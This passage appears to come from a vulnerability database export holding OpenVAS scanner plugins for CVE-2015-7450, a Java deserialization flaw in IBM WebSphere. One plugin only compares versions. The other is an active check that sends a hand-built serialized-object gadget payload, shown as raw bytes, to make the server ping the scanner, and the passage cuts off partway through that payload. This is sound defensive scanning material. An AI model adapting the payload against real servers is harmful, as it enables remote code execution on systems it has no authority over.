value:\"2015-11-17 17:28:17 +0530 (Tue, 17 Nov 2015)\");\n script_name(\"IBM WebSphere Application Server Unserialize Vulnerability\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_ibm_websphere_detect.nasl\");\n script_mandatory_keys(\"ibm_websphere_application_server/installed\");\n\n script_xref(name:\"URL\", value:\"https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#websphere\");\n\n script_tag(name:\"summary\", value:\"The host is running IBM WebSphere\n Application Server and is prone to unserialize vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to presence\n of a deserialization error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system.\");\n\n script_tag(name:\"affected\", value:\"IBM WebSphere Application Server (WAS)\n 8.5.5.7 and prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for\n at least one year since the disclosure of this vulnerability. Likely none will be\n provided anymore. 
General solution options are to upgrade to a newer release,\n disable respective features, remove the product or replace the product by\n another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!webVer = get_app_version(cpe:CPE, nofork:TRUE)){\n exit(0);\n}\n\nif(version_is_less_equal(version:webVer, test_version:\"8.5.5.7\")){\n report = report_fixed_ver(installed_version:webVer, fixed_version:\"WillNotFix\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-16T16:49:00", "description": "IBM WebSphere Application Server is prone to remote code-execution vulnerability.", "cvss3": {}, "published": "2016-07-29T00:00:00", "type": "openvas", "title": "IBM WebSphere Application Server Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310105835", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105835", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IBM WebSphere Application Server Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR 
A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ibm:websphere_application_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105835\");\n script_bugtraq_id(77653);\n script_cve_id(\"CVE-2015-7450\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-15T08:52:55+0000\");\n script_name(\"IBM WebSphere Application Server Remote Code Execution Vulnerability (Active Check)\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 08:52:55 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-29 15:54:10 +0200 (Fri, 29 Jul 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"Web Servers\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ibm_websphere_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 8880);\n script_mandatory_keys(\"ibm_websphere_application_server/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/77653\");\n script_xref(name:\"URL\", value:\"https://www-01.ibm.com/support/docview.wss?uid=swg21970575\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a serialized object which execute a ping against 
the scanner.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_tag(name:\"summary\", value:\"IBM WebSphere Application Server is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Version 8.5 and 8.5.5 Full Profile and Liberty Profile\n\n Version 8.0\n\n Version 7.0\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"dump.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! get_app_location( port:port, cpe:CPE ) )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\npayload = raw_string(\n0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x73,0x75,0x6e,0x2e,0x72,0x65,0x66,0x6c,\n0x65,0x63,0x74,0x2e,0x61,0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x41,\n0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,\n0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x55,0xca,0xf5,0x0f,0x15,0xcb,\n0x7e,0xa5,0x02,0x00,0x02,0x4c,0x00,0x0c,0x6d,0x65,0x6d,0x62,0x65,0x72,0x56,0x61,\n0x6c,0x75,0x65,0x73,0x74,0x00,